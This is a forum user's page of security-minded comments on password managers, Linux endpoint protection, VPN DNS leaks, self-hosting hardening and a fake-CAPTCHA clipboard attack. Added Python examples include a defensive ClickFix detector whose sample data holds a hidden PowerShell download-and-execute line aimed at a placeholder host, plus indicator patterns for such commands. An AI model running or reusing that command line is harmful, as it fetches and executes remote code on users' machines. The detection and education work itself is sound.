• 2 Posts
  • 75 Comments
Joined 2 years ago
Cake day: June 7th, 2023

  • Maybe we should consider not letting everyone set up whatever the fuck they want, whenever they want, however they want and assuming it’s all good because, “it’s in the cloud”. And then that setup gets either dumped in IT’s lap in its half-assed state (if you’re lucky) or is left running, long forgotten, until an attacker finds it and informs the organization about its continued existence by spinning up a coin miner.

    “The cloud” does need a lot of work on configuration management. But, that doesn’t mean just another fancy tool to fix the fuckups. It means policies and procedures to make the broken configs harder to implement in the first place. But that doesn’t have AI and flashy dashboards to wow the execs into spending more money. It just has users whining about waiting for an understaffed IT organization not getting things done “right now” for a project that has a deadline of tomorrow, which has been known about for three months.

  • This really is solvable with a KeePass setup, but it is harder. I use KeePass and host my own Nextcloud instance. One of the files I have up there is my KeePass database. If I need one of my passwords, I access it from my phone and type it in. If I really, really wanted to drop my password database on someone else’s computer, I could log in to my Nextcloud instance via a web browser, pull down the file and run KeePass as a portable executable (not installed). It’d be a PITA (and there are some caveats around this process), but it’s certainly possible.

    That said, online password managers make sense for a lot of use cases. I generally recommend BitWarden when people ask me what to use. The whole “KeePass and manual sync” answer really only works for those folks who want to self host lots of things. And it brings its own set of risks with it. I’m the type of weirdo who is running Splunk locally, feeds all my logs into it and has dashboards set up (and looked at regularly) dealing with security. I have no expectation that my wife will do that and so she uses BitWarden.

    I think the most important thing to convince people of is “use a password manager”. The problem TommySoda brought up is very real:

    While I understand that password reuse is a problem I also understand that remembering 50+ passwords, because literally everything requires you to make an account, is impossible.

    The hard thing to teach people is that you don’t actually need to know those 50+ passwords, nor should you care what they are. With a password manager, they can be the crazy unique 20-character random string of letters, numbers, symbols, upper and lower case characters. And you won’t care. Open the website, and either copy/paste the password or (if your password manager supports it) use the auto-type feature. There are risks to each; but, nothing will ever be without risk. Just please folks, stop reusing passwords. That’s bad, m’kay.

  • It depends on the environment. I’ve been in a couple of places which use Linux for various professional purposes. At one site, all systems with a network connection were required to have A/V, on-access scanning and regular system scans. So, even the Linux systems had a full A/V agent and we were in the process of rolling out EDR to all Linux-based hosts when I left. That was a site where security tended to be prioritized, though much of it was also “checkbox security”. At another site, A/V didn’t really exist on Linux systems and they were basically black boxes on the network, with zero security oversight. Last I heard, that was finally starting to change and Linux hosts were getting the full A/V and EDR treatment. Though, that’s always a long process. I also see a similar level of complacency in “the cloud”. Devs spin random shit up, give it a public IP, set the VPS to a default allow and act like it’s somehow secure because, “it’s in the cloud”. Some of that will be Linux-based. And in six months to a year, it’s woefully out of date, probably running software with known vulnerabilities, fully exposed to the internet and the dev who spun it up may or may not be with the company anymore. Also, since they were “agile”, the documentation for the system is filed under “lol, wut?”

    Overall, I think Linux systems are a mixed bag. For a long time, they just weren’t targeted with normal malware. And this led to a lot of complacency. Most sites I have been at have had a few Linux systems kicking about; but, because they were “one off” systems and from a certain sense of invulnerability, they were poorly updated and often lacked a secure baseline configuration. The whole “Linux doesn’t get malware” mantra was used to avoid security scrutiny. At the same time, Linux systems do tend to default to a more secure configuration. You’re not going to get a BlueKeep-type vulnerability from a default config. Still, it’s not hard for someone who doesn’t know any better to end up with a vulnerable system. And things like ransomware, password stealers, RATs or other basic attacks often run just fine in a user context. It’s only when the attacker needs to get root that things get harder.

    In a way, I’d actually appreciate a wide-scale, well-publicized ransomware attack on Linux systems. First off, it would show that Linux is finally big enough for attackers to care about. Second, it would provide concrete proof as to why Linux systems should be given as much attention and centrally managed/secured in the enterprise. I know everyone hates dealing with IT for provisioning systems, and the security software sucks balls; but, given the constant barrage of attacks, those sorts of things really are needed.

  • It depends on what your goals are.

    • Ventoy is good for having an alternate OS on a thumb drive. Even with a USB 3 device, you may encounter I/O blocking and find this isn’t suitable as a “daily driver” OS. However, for booting something like Tails or Windows/Linux for OS-specific hardware/applications, it can be a good solution.
    • Dual booting is a good way to “test drive” an alternate OS and also have a way to fall back to the other OS if you regularly need access to some software which only runs on that OS. This is likely to have better performance than the USB/Ventoy setup at the cost of Windows fucking up the bootloader config from time to time.
    • Windows/Linux with a Linux/Windows VM is useful when you know what OS you want to run on a day-to-day basis, but have some reason to reach into the other OS on occasion and aren’t too worried about performance and hardware access in the alternate OS.

    Ultimately, it’s going to come down to what you are trying to do and why you want to run multiple operating systems. For example, my main system is running Linux. But, I want the ability to run Windows malware in a controlled sandbox (not a euphemism, I work in cybersecurity and lab some stuff for fun). So, I have KVM set up to run virtual machines, including Windows.

    For another example, prior to making the switch to Linux, I had Windows as my primary OS and booted Linux on a USB stick (not Ventoy, but close enough). This let me gain confidence that I would be able to make the jump.

    I don’t have a good example for dual booting. Maybe something like a Steam Deck where you want a stable, functional OS most of the time; but, have some games which will only run in Windows.

  • It makes little sense why it works on an offsite WiFi, but not mobile data.

    I’d agree with unbuckled above, it’s a DNS issue. If your mobile device is capable, use nslookup or dig to see what responses you are getting in different scenarios. It’s possible that your VPN software is leaking DNS queries out to the mobile data provider’s DNS servers while you are on mobile data and only using the correct DNS settings when you are on WiFi. Possibly look for split tunnel settings in the VPN software, as this can create this type of situation.

    You can also confirm this from the pihole side. Connect to the VPN via mobile data and browse to some website you don’t use often, but is not your own internal stuff. Then open the query log on your pihole and see if that domain shows up. I’d put money on that query not showing in the pihole query log.
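    The Pi-hole-side check described in this comment, as an added example that is not part of the original post: it parses constructed dnsmasq-style query lines (the format Pi-hole writes to its log) and reports whether a given domain was ever resolved through Pi-hole from the phone's VPN address, which is assumed here to be 10.8.0.2.

```python
import re
from collections import defaultdict

# Pi-hole/dnsmasq query lines look like: "<date> dnsmasq[pid]: query[A] host.example from 10.8.0.2"
QUERY_RE = re.compile(r"dnsmasq\[\d+\]: query\[(?P<qtype>[A-Z]+)\] (?P<name>\S+) from (?P<client>\S+)")

def parse_queries(lines):
    """Map each queried name to the set of client addresses that asked Pi-hole for it."""
    seen = defaultdict(set)
    for line in lines:
        m = QUERY_RE.search(line)
        if m:
            seen[m.group("name").lower().rstrip(".")].add(m.group("client"))
    return seen

def queries_reached_pihole(lines, domain, client):
    """True if Pi-hole logged a query for domain (or any subdomain) coming from the given client."""
    domain = domain.lower().rstrip(".")
    for name, clients in parse_queries(lines).items():
        if (name == domain or name.endswith("." + domain)) and client in clients:
            return True
    return False

# Constructed sample log, not a real Pi-hole capture. 10.8.0.2 is the assumed VPN address of the phone.
SAMPLE_LOG = """\
Jan  5 10:00:01 dnsmasq[812]: query[A] nextcloud.home.lan from 10.8.0.2
Jan  5 10:00:01 dnsmasq[812]: reply nextcloud.home.lan is 192.168.1.10
Jan  5 10:00:07 dnsmasq[812]: query[AAAA] nextcloud.home.lan from 10.8.0.2
Jan  5 10:03:44 dnsmasq[812]: query[A] www.example.org from 192.168.1.20
""".splitlines()

if __name__ == "__main__":
    # Internal names resolve via Pi-hole, but the public test site never arrived from the VPN client:
    # that is the "query not showing in the pihole query log" symptom the comment predicts.
    print("home.lan from VPN client:", queries_reached_pihole(SAMPLE_LOG, "home.lan", "10.8.0.2"))
    print("example.org from VPN client:", queries_reached_pihole(SAMPLE_LOG, "example.org", "10.8.0.2"))
```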

  • We’ve been seeing these types of attacks for a couple of months, mostly not from Telegram links. The way they work is pretty ingenious, in that it leverages the fact that everyone has gotten used to the various “do this thing to prove you’re human” prompts. In this case the attack works like:

    • User is directed to a link controlled by the attacker. The link will claim to be something the user wants.
      • In my experience, this has been movie or software downloads.
    • This site presents a page which basically says “prove you are human to get the thing”.
    • In the background, the attack site uses JavaScript to pre-load the user’s clipboard with a malicious PowerShell command.
    • The site’s instructions to “prove you are human” look like:
      1. Press the key combination Win+R
      2. Press the key combination Ctrl+V
      3. Press Enter
    • The user, being trained to “prove they are human”, follows these instructions, resulting in a PowerShell command being run which downloads the malicious payload and executes it.

    The payloads we’ve seen have been info stealers (RedLine, Lumma Stealer, etc.). They also drop some type of Remote Access Tool (e.g. AnyDesk) which the attacker could come back to later, move laterally and try to deploy ransomware.
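    A detection-side view of the Win+R / Ctrl+V chain described above, as an added example that is not part of the original comment: it scores constructed process-creation records (Sysmon Event ID 1 style fields: Image, ParentImage, CommandLine) for a shell launched straight from explorer.exe, which is what the Run dialog produces, combined with download-and-execute traits in the command line. The indicator patterns and the sample records are assumptions made for illustration.

```python
import re

# Win+R hands the pasted text to the Run dialog, so the resulting shell's parent is explorer.exe
RUN_DIALOG_PARENTS = {"explorer.exe"}
SHELL_IMAGES = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line traits typical of a pasted download-and-execute one-liner (assumed indicator list)
SUSPICIOUS_PATTERNS = [
    re.compile(r"-(?:enc|encodedcommand)\b", re.I),
    re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    re.compile(r"(?:downloadstring|downloadfile|invoke-webrequest|\biwr|\bcurl)\b", re.I),
    re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    re.compile(r"https?://", re.I),
]

def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()

def score_event(event):
    """Return (score, reasons) for one process-creation record."""
    reasons = []
    if basename(event["ParentImage"]) in RUN_DIALOG_PARENTS and basename(event["Image"]) in SHELL_IMAGES:
        reasons.append("shell spawned directly by explorer.exe (Run dialog / Win+R path)")
    for pat in SUSPICIOUS_PATTERNS:
        if pat.search(event["CommandLine"]):
            reasons.append(f"command line matches /{pat.pattern}/")
    return len(reasons), reasons

def find_clickfix(events, threshold=3):
    """Records that combine the Run-dialog launch with enough download/execute traits to alert on."""
    hits = []
    for event in events:
        score, reasons = score_event(event)
        if score >= threshold:
            hits.append((event, reasons))
    return hits

# Constructed sample records, not real telemetry
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell -w hidden -c \"iex (New-Object Net.WebClient).DownloadString('http://example.invalid/x')\""},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Vendor\agent.exe",
     "CommandLine": r"powershell -File C:\scripts\inventory.ps1"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe"},
]
```

    Only the first sample record trips the rule; the scheduled PowerShell script under a vendor agent and the Run-dialog launch of Notepad both score zero, which is the kind of separation an EDR rule needs to avoid paging on every Win+R.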

  • Along with the things others have said (Backups, Linux, Docker, Networking) I’d also recommend getting comfortable with server and network security. A lot of this is wrapped up in the simple mantra “install your goddamn updates!” But, there is more to it than that. For example, if you go with Nextcloud, read through their hardening guide and seriously consider implementing all of the recommendations. Also think through how you intend to manage both the server and instance. If this is all local, then it is easier as you can keep SSH access to the server firewalled off from the internet. If you host part of your stuff “in the cloud”, you’ll want to start looking at limiting down access and using keys to log in (which is good practice for all situations). Also, never use default credentials.

    You may also want to familiarize yourself with the logs provided by the applications and maybe set up some monitoring around them. I personally run Nextcloud and I feed all my logs into Splunk (you can run a free instance in a Docker container). I have a number of dashboards I look at every morning to keep an eye on things. E.g. failed/successful logins, traffic sources, URI requests, file access, etc.

    If your server is attached to the internet it will be under attack constantly. Fail2Ban on my WireGuard container banned 112 IP addresses over the last 24 hours, for 3 failed attempts to log in via SSH. Less commonly, attackers try to log in to my Nextcloud instance. And my WordPress site is under constant attack. If you choose to run WordPress, be very careful about the plugins you choose to install, and then keep them up to date. WordPress itself is reasonably secure, the plugins are a shit-show and worse when they aren’t kept up to date.
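    The “3 failed attempts” SSH rule mentioned above, as an added example that is not the commenter's Fail2Ban configuration: it applies a Fail2Ban-style maxretry/findtime window to constructed sshd auth.log lines and returns the addresses that would be banned. The sample lines, the 2024 year assumed for the year-less syslog timestamps, and the 600-second window are assumptions chosen for illustration.

```python
import re
from collections import defaultdict, deque
from datetime import datetime

# Typical sshd failure line; the syslog timestamp carries no year, so one is assumed when parsing
FAIL_RE = re.compile(r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?\S+ from (?P<ip>[\d.]+) port \d+")

def parse_failures(lines, year=2024):
    """Yield (timestamp, ip) for each failed SSH password attempt; other lines are ignored."""
    for line in lines:
        m = FAIL_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m.group('ts')}", "%Y %b %d %H:%M:%S")
            yield ts, m.group("ip")

def ips_to_ban(lines, maxretry=3, findtime=600):
    """Fail2Ban-style rule: ban an IP once it has maxretry failures within findtime seconds."""
    window = defaultdict(deque)   # per-IP timestamps still inside the findtime window
    banned = {}                   # ip -> time the ban would be triggered
    for ts, ip in parse_failures(lines):
        if ip in banned:
            continue
        q = window[ip]
        q.append(ts)
        while (ts - q[0]).total_seconds() > findtime:
            q.popleft()
        if len(q) >= maxretry:
            banned[ip] = ts
    return banned

# Constructed sample auth.log, not a real capture (documentation-range addresses)
SAMPLE_AUTH_LOG = """\
Jan  5 10:00:01 server sshd[2201]: Failed password for invalid user admin from 203.0.113.5 port 51234 ssh2
Jan  5 10:00:05 server sshd[2203]: Failed password for root from 203.0.113.5 port 51236 ssh2
Jan  5 10:00:09 server sshd[2205]: Failed password for invalid user test from 203.0.113.5 port 51240 ssh2
Jan  5 10:01:00 server sshd[2210]: Failed password for invalid user pi from 198.51.100.7 port 40000 ssh2
Jan  5 10:01:30 server sshd[2212]: Failed password for invalid user pi from 198.51.100.7 port 40002 ssh2
Jan  5 10:10:00 server sshd[2220]: Failed password for root from 203.0.113.9 port 33001 ssh2
Jan  5 10:25:00 server sshd[2230]: Failed password for root from 203.0.113.9 port 33002 ssh2
Jan  5 10:40:00 server sshd[2240]: Failed password for root from 203.0.113.9 port 33003 ssh2
Jan  5 10:41:00 server sshd[2250]: Accepted publickey for alice from 192.168.1.5 port 50000 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, when in ips_to_ban(SAMPLE_AUTH_LOG).items():
        print(f"ban {ip} (third failure at {when:%H:%M:%S})")
```

    Note the slow attacker at 203.0.113.9: three failures spread over thirty minutes never sit inside one ten-minute window, so a default-style findtime misses it and only a wider window (or a cumulative counter) catches it.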